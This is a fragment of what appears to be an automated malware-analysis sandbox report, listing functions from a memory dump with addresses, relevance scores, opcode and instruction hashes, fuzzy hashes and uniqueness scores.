                                              Similarity
                                              • API ID:
                                              • String ID: jt)a
                                              • API String ID: 0-1490339538
                                              • Opcode ID: 217175331aca178eb80dc60da370807cd601c0adfd69e2ef05c1433fad050216
                                              • Instruction ID: 3cb4b74b1c696c6b5d95700f81aa9f6308f64ec089dc9ee3d9599358de39b5f6
                                              • Opcode Fuzzy Hash: 217175331aca178eb80dc60da370807cd601c0adfd69e2ef05c1433fad050216
                                              • Instruction Fuzzy Hash: DE51E722B1CE4A8FEB49E76894663F9B7E1FF95710F044179E04ED31E3DE28A8458381
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033306D5, Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001E.00000002.588446940.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: j`
                                              • API String ID: 0-3204994738
                                              • Opcode ID: 71ebdae3094a8e28c1f4653c89e7c110ea0d189739799f1f00d37c4d8ae29fe9
                                              • Instruction ID: 84936721782015724e91175a1714d890b872f943ce51102f762b2482f287193e
                                              • Opcode Fuzzy Hash: 71ebdae3094a8e28c1f4653c89e7c110ea0d189739799f1f00d37c4d8ae29fe9
                                              • Instruction Fuzzy Hash: 6651E430B2991DCFE68AF77880E15A973A6FFD5305B908475E00EC76D7DE3898419788
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD0333122D, Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001E.00000002.588446940.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: ]r_H
                                              • API String ID: 0-175258724
                                              • Opcode ID: 8438ffda31f148f444176275a2663f0f194a4373929ea4fa3dfcdd328ea44955
                                              • Instruction ID: 09bf0e8af5e04dfcf7d1327bcb817ed0258d8ab585c65de54439b4596f74dc30
                                              • Opcode Fuzzy Hash: 8438ffda31f148f444176275a2663f0f194a4373929ea4fa3dfcdd328ea44955
                                              • Instruction Fuzzy Hash: F431F831E59A499FEB44FB2488A54F977F1FF85311B4080B6E40CD72A3CE3869428741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033302F0, Relevance: .3, Instructions: 319COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001E.00000002.588446940.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9c57a720d1d1834518b8aa7cc6daa83c1dc3a97d46a37117c42e5d0c4112250f
                                              • Instruction ID: 897ef08af141735a27298e1b0a2235dd3f341afdd993076ffc201a9b28cd328d
                                              • Opcode Fuzzy Hash: 9c57a720d1d1834518b8aa7cc6daa83c1dc3a97d46a37117c42e5d0c4112250f
                                              • Instruction Fuzzy Hash: EA41F224B6E95D8FE685F72D80E15E877A1EFCA222B80C0B2E04DC33C7DD1C6845A759
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033300D0, Relevance: .2, Instructions: 248COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001E.00000002.588446940.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8edc6ef623473a32a69ee73951680fcb3be24d8e354ba8c3ac7dc3a4cec1705a
                                              • Instruction ID: 9e3b31190b7f2d9bf8d809de66ca37456e5e34c2213452e1e82df641bc04a12c
                                              • Opcode Fuzzy Hash: 8edc6ef623473a32a69ee73951680fcb3be24d8e354ba8c3ac7dc3a4cec1705a
                                              • Instruction Fuzzy Hash: C461651BB5E5925AEE15F23E74B60E93FA0CFC133670410B7D1CC890A3DD4868DE8A95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033301A8, Relevance: .1, Instructions: 149COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001E.00000002.588446940.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1daf6f8281496748d678301df81784addad09da0ec523bdff76e92cc89d83b23
                                              • Instruction ID: aefc877cfe5382d12783d7c80ce6126d38b164f5e8baa8e0363fc17874f0aea4
                                              • Opcode Fuzzy Hash: 1daf6f8281496748d678301df81784addad09da0ec523bdff76e92cc89d83b23
                                              • Instruction Fuzzy Hash: D941A417B5E9924BEA55F33E74B60FD3B90CFD133670800B7D08CCA0A7DD48689A8A95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033302C0, Relevance: .1, Instructions: 139COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001E.00000002.588446940.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3277bfbcc9b5d3c61c228bd6e947fa4188bb6cd6094e04a7011cd9145445c104
                                              • Instruction ID: f3afe8ea2f367465659cc04041b25b4d174972f8abc8dcb1d350fdbbf9fe634c
                                              • Opcode Fuzzy Hash: 3277bfbcc9b5d3c61c228bd6e947fa4188bb6cd6094e04a7011cd9145445c104
                                              • Instruction Fuzzy Hash: 04419330F1894D8FDB88FF6884A4AE977E1FF58305F5085B6E00DD7296DA38A9418B80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033309B9, Relevance: .1, Instructions: 132COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001E.00000002.588446940.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6bdcac04295f688c8a6ba5410e51f3f76839ff3164d0a3e8aef329dbb4587d12
                                              • Instruction ID: fc7bfae5d2ede8dde29b2c2dec69dd5036f59483c7f8e7562b6857bf1edc5a39
                                              • Opcode Fuzzy Hash: 6bdcac04295f688c8a6ba5410e51f3f76839ff3164d0a3e8aef329dbb4587d12
                                              • Instruction Fuzzy Hash: F931F721B1DB498FE75CF72894A67B977D0EF95311F04417AE04ED31A3DD28A8058256
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03330210, Relevance: .1, Instructions: 107COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001E.00000002.588446940.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e43ca2eca67d8a4623e7b8f1ce37e6456042016259552b9d26fd685b8a817417
                                              • Instruction ID: 5e4bb9554a40a6fc554d3753d557c4a559c0ad4d62b085c65333c1c1cc6c6c9f
                                              • Opcode Fuzzy Hash: e43ca2eca67d8a4623e7b8f1ce37e6456042016259552b9d26fd685b8a817417
                                              • Instruction Fuzzy Hash: 0831C317B1E8954BEA54F32E64B55FD3B90DFD523670400B7E08CCA0A7DD08589B8791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03330248, Relevance: .1, Instructions: 84COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001E.00000002.588446940.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e8c548ebbb4e3a8bd1fbdff2fa9a1cfb596c1f8b6c71a1d77a8eaf84e5ea11c3
                                              • Instruction ID: 26bc18307a6e67b3c6db46d195d13a415bad8abfb72a17f15c2736bffbb8162a
                                              • Opcode Fuzzy Hash: e8c548ebbb4e3a8bd1fbdff2fa9a1cfb596c1f8b6c71a1d77a8eaf84e5ea11c3
                                              • Instruction Fuzzy Hash: 74119316B1E8654BEA54F22E74E55F93B90CFD533670401B7E08CC61A3DD08589B8B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033305D5, Relevance: .1, Instructions: 84COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001E.00000002.588446940.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dab2405e657fdf8235a094e5ce26780e85389543fe97245daf7b6e7499a0bf7f
                                              • Instruction ID: a4d41edbac0f40493d6d014f46917ff80488e236def7adf9d92e420c72d8d9b5
                                              • Opcode Fuzzy Hash: dab2405e657fdf8235a094e5ce26780e85389543fe97245daf7b6e7499a0bf7f
                                              • Instruction Fuzzy Hash: 32219014F4DA1786FB9DB3B490F22B92689AF80701F4080B9E44FE61EFDD1CF8059662
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03330B59, Relevance: .1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001E.00000002.588446940.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bca5f295915109f0de281616101017f54b2c1e7d170b5bc0197242c2592fbd4a
                                              • Instruction ID: 5f55660819d16f4625bc3941a2c2228a99f9b03a7b3ffb41c617bcbd05e957a4
                                              • Opcode Fuzzy Hash: bca5f295915109f0de281616101017f54b2c1e7d170b5bc0197242c2592fbd4a
                                              • Instruction Fuzzy Hash: 3511C22070DAC94FE78AF33C54A8AB53FD1AB9A225B0941E6E08DCB0B3C9588845C342
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD03330298, Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001E.00000002.588446940.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0b04a7dd9b3755de0b1520d2b28211cd50f546d48eb3f7adb08c5829defcd2f2
                                              • Instruction ID: 942d2398b566fbd3672ba8b625d697db0e660281e0096e955563f013385533f0
                                              • Opcode Fuzzy Hash: 0b04a7dd9b3755de0b1520d2b28211cd50f546d48eb3f7adb08c5829defcd2f2
                                              • Instruction Fuzzy Hash: 50F0B421B19C198FEB94F22D50F9AF937D5DFAC2257100177E44DC32A3DD189C868781
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00007FFD033302B0, Relevance: .0, Instructions: 21COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000001E.00000002.588446940.00007FFD03330000.00000040.00000001.sdmp, Offset: 00007FFD03330000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d6c9eb8cd2b4c5cd3c222d9150092e4ab9c317bd515d71d7a2ea65023309c6e
                                              • Instruction ID: a461443b039f7b64bc18d898b9bf010d8aca8f66ad48c9d5ec470207e8ebccb2
                                              • Opcode Fuzzy Hash: 1d6c9eb8cd2b4c5cd3c222d9150092e4ab9c317bd515d71d7a2ea65023309c6e
                                              • Instruction Fuzzy Hash: 40D05E10B14D094A63DCF23900ADB7A44C9CBA8605B104175A40ED22A7DC1858018240
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions